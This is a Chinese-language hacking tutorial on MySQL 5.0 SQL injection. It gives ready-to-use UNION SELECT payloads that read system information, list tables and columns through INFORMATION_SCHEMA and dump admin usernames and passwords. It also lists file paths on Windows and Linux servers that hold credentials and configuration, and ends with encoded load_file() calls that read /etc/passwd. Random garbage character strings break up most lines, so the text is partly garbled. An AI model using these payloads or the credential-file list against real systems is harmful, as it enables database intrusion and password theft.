mysql5.0注入原理

admin

记得之前园长说不知道MYSQL5.0以上的IFORMATION_SCHEMA表的结构就说自己懂得注入的是很傻逼的事情。于是了解了一番。
) j5 `/ D% n6 X) v; T8 i

8 C  t* S+ p6 I% l
Mysql5内置的系统数据库IFORMATION_SCHEMA,其结构如MSSQL中的master数据库，其
中记录了Mysql中所有
存在数据库名、数据库表、表字段。重点要求研究几个对SQL注入有用的数据表说
明。
1.得到所有数据库名：
9 f0 |6 R. c- z7 P! {8 D- ~# v|SCHEMATA ->存储数据库名的表
. L/ }+ B6 Y3 ~! W; @$ U4 _; T  p2 r7 V1 _|—字段：SCHEMA_NAME ->数据库名称
, j1 d4 e0 s; Y9 d6 ]
|TABLES ->存储表名
' v$ N, }; _4 F( }; F# I|—字段：TABLE_SCHEMA ->表示该表名属于哪个数据库名
|—字段：TABLE_NAME ->存储表的表名
; Q# P1 y0 [7 [/ }# b0 S7 v7 `
|COLUMNS ->存储的字段名表
|—字段：TABLE_SCHEMA ->该字段所属数据库名
9 _" M) e0 a: \) E$ \, K0 N1 ]|—字段：TABLE_NAME ->存储所属表的名称
) R& N; g( X3 J" [
) y0 l% M" f1 D1 i# ]; H7 s+ e/ p|—字段：COLUMN_NAME ->该字段的名称
  s' R9 U; U, \/ }/ M  E, x. y/ R
#########################################################################
7 D- |, I; ^& z  L& f* R##

+ k' v& U1 t+ ?+ U0×001 获取系统信息:
& I" T3 U' E2 \! z$ I4 j1 z( Z$ u
union select 1,2,3,4,5,concat
(@@global.version_compile_os,0x3c62723e,@@datadir,0x3c62723e,user
(),0x3c62723e,version()da?tabase(),0x3c62723e,database()),7,8,9 /*
: `# u; K7 L6 E7 e" ~
/*
& t9 t  O, f$ N, f% u
@@global.version_compile_os 获取系统版本
1 ?$ N3 E$ j! C* X8 P
( Z, l8 o* _  m0 f3 c2 ]/ b@@datadir 数据库路径
database() 当前数据库名称
8 q* Y/ b! S& |- U$ ]7 J* z) O0x3c62723e 换行HEX值

' s9 T5 m' P5 U. a/ A" `6 M*/
" h! r/ y) _9 N) `9 H% M0 l
######################################################################

0×002 获取表名
* K/ Z' F9 s. m1 m9 Z' M3 l
union select 1,2,group_concat(table_name),4,5,6,7,8,9 from
( q; ^0 R1 ?, Ginformation_schema.tables where table_schema=0x67617264656e /*
4 g: m* S2 b( r# a( _0 g+ q1 y$ f
. W: ]1 z2 E% {6 A- Y7 @1 g/ ~/*

* T  D* x4 X  d0x67617264656e 为当前数据库名

group_concat(table_name) 使用group_concat函数 一步获得该库所有表名

*/

######################################################################
6 N6 p% ]2 `5 K% Y5 e" [* F5 n
8 M* s4 L8 K& e0×003 获取字段

union select 1,2,group_concat(column_name),4,5,6,7,8,9 from
information_schema.columns where table_name=0x61646d696e and
* ~/ |' M+ x, `0 ]7 ]0 R

2 l/ Z8 U# K8 Z1 Q+ ytable_schema=0x67617264656e limit 1 /*

1 x" v  |; ~' S+ G/ ?/*

group_concat(column_name) 同样是 一口气 获得该表（0x61646d696e）所有字段

0x61646d696e ->选择一个表
) h( T1 i8 C; _' t0 o# l# C
# o$ V1 x1 v: F* m% Y& m0x67617264656e ->数据库名
& u0 F; s0 @2 ~9 W1 I/ z
*/
2 B  t2 g, Z, h+ x; o/ N: n$ K0 ~
#####################################################################
0 V3 B: M- r. Y0 c3 y, p
" R0 B; F- k# X+ D* F1 o0×004 获取数据
( Z2 G" e, J' K+ h$ P4 ?( a
union select 1,2,3
,4,5,concat(id,0x3c62723e,adname,0x3c62723e,adpassword),6,7,8 from admin
3 }( K; `' d% c1 g% V
! L; ]# F, O  _0 eunion select 1,group_concat(id),group_concat(adname),4,5,group_concat
9 k/ W" |, i0 [( W( @! L! c(adpassword),6,7,8 from admin
* ~; ^( {8 y' R' F. C
5 @  \- N- E' U( {3 D/*

0x3c62723e 换行符号HEX编码

group_concat 同时获得该字段所有数据
$ R, U+ w% P2 }8 m; `  X
" _2 _" D! R9 A$ N*/
* F* a& T! I6 j+ z: i" w# r2 l



  F/ `6 _: u! F
顺便添加一些mysql注入时非常有用的一些东西

! p; a1 @9 ?. Q+ C简单介绍Mysql注入中用到的一些函数的作用，利用它们可以判断当前用户权限（Root为最高，相当于MSSQL中的SA）、数据库版本、数据库路径、读取敏感文件、网站目录路径等等。

8 s6 _5 ]  R6 i0 |( [0 y* {1:system_user() 系统用户名
2:user()        用户名
0 t  a6 W3 x: i4 J3:current_user()  当前用户名
4:session_user()连接数据库的用户名
# N% |) s8 T' u- M0 C& w5:database()    数据库名
6:version()     MYSQL数据库版本
! X* M+ J; T  {' q8 v7 ^* X4 [7:load_file()   MYSQL读取本地文件的函数
" a( p" t8 |' }8 L* ~% v8@datadir     读取数据库路径
7 t, m8 h2 H- E* F# s9 L9@basedir    MYSQL 安装路径
10@version_compile_os   操作系统  Windows Server 2003,
, O* ~7 a) N/ T5 p  ?# f3 x收集的一些路径：
WINDOWS下:
% R& z! K) o2 v  J) I( b9 ^c:/boot.ini          //查看系统版本
7 r" S% l& u8 a" T  N7 n. Ec:/windows/php.ini   //php配置信息
c:/windows/my.ini    //MYSQL配置文件，记录管理员登陆过的MYSQL用户名和密码
9 [" O- f$ b, W9 f* d% o: L/ \c:/winnt/php.ini
c:/winnt/my.ini
c:\mysql\data\mysql\user.MYD  //存储了mysql.user表中的数据库连接密码
c:\Program Files\RhinoSoft.com\Serv-U\ServUDaemon.ini  //存储了虚拟主机网站路径和密码
4 s2 F; _* O6 Rc:\Program Files\Serv-U\ServUDaemon.ini
3 d* X' o+ ~9 @0 z2 u6 Pc:\windows\system32\inetsrv\MetaBase.xml  //IIS配置文件
( |8 K6 o. j$ q9 f9 M) ~c:\windows\repair\sam  //存储了WINDOWS系统初次安装的密码
5 D. c1 w1 L9 d: U* Vc:\Program Files\ Serv-U\ServUAdmin.exe  //6.0版本以前的serv-u管理员密码存储于此
& N$ o5 @1 E. N4 c1 g3 |. N$ lc:\Program Files\RhinoSoft.com\ServUDaemon.exe
8 u, h7 i5 k1 k8 zC:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\*.cif文件
//存储了pcAnywhere的登陆密码
c:\Program Files\Apache Group\Apache\conf \httpd.conf 或C:\apache\conf \httpd.conf //查看     WINDOWS系统apache文件
c:/Resin-3.0.14/conf/resin.conf   //查看jsp开发的网站 resin文件配置信息.
+ {0 m# y$ @! `: \$ T
9 D+ ^% `5 h! v) i% p) {
c:/Resin/conf/resin.conf      /usr/local/resin/conf/resin.conf 查看linux系统配置的JSP虚拟主机
9 K" h, J! y  I" X/ y& f* @9 Kd:\APACHE\Apache2\conf\httpd.conf
C:\Program Files\mysql\my.ini
& b. r' F# y0 C0 vc:\windows\system32\inetsrv\MetaBase.xml 查看IIS的虚拟主机配置
8 S# p+ o% C6 d- G3 yC:\mysql\data\mysql\user.MYD 存在MYSQL系统中的用户密码
/ j2 m" q' _* _$ i/ M
* Y. {) r2 [  O: H! q+ O0 sLUNIX/UNIX下:
1 _7 ?2 U+ c& ?: s# ~. H/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
7 o+ a$ K. X. G+ Y0 S4 R/usr/local/apache2/conf/httpd.conf
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/iptables //从中得到防火墙规则策略
( X6 @1 u4 a: |) J/etc/httpd/conf/httpd.conf // apache配置文件
  ^' {0 X2 I4 l: c/etc/rsyncd.conf //同步程序配置文件
5 x* I8 K3 r( i8 m! h5 {/etc/my.cnf //mysql的配置文件
0 t# `) K4 u2 p( a; ~/etc/redhat-release //系统版本
/etc/issue
2 k, \" d$ _5 g# r# f/etc/issue.net
$ V6 [: l# j: i& y& B/usr/local/app/php5/lib/php.ini //PHP相关设置
# m; m  `9 c, t" G  T5 a" Y- n/usr/local/app/apache2/conf/extra/httpd-vhosts.conf //虚拟网站设置
4 E. O- M4 S3 Z$ b: Y% m/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
* j- m) `% u) v) R8 T/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
9 L" t* R8 |$ V  B- ]( H* ~" a  n- S/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
! w8 Q/ ~/ S. u4 D: K/etc/httpd/conf/httpd.conf或/usr/local/apche/conf/httpd.conf 查看linux APACHE虚拟主机配置文件
/usr/local/resin-3.0.22/conf/resin.conf  针对3.0.22的RESIN配置文件查看
, P! V2 @- O& A! A/usr/local/resin-pro-3.0.22/conf/resin.conf 同上
/usr/local/app/apache2/conf/extra/httpd-vhosts.conf APASHE虚拟主机查看
/etc/sysconfig/iptables 查看防火墙策略
8 G6 t- @, {0 @" E3 lload_file(char(47)) 可以列出FreeBSD,Sunos系统根目录
replace(load_file(0x2F6574632F706173737764),0x3c,0×20)
8 h5 Z6 ]9 x! @: R5 Kreplace(load_file(char(47,101,116,99,47,112,97,115,115,119,100)),char(60),char(32))
上面两个是查看一个PHP文件里完全显示代码.有些时候不替换一些字符,如 “<” 替换成”空格” 返回的是网页.而无法查看到代码.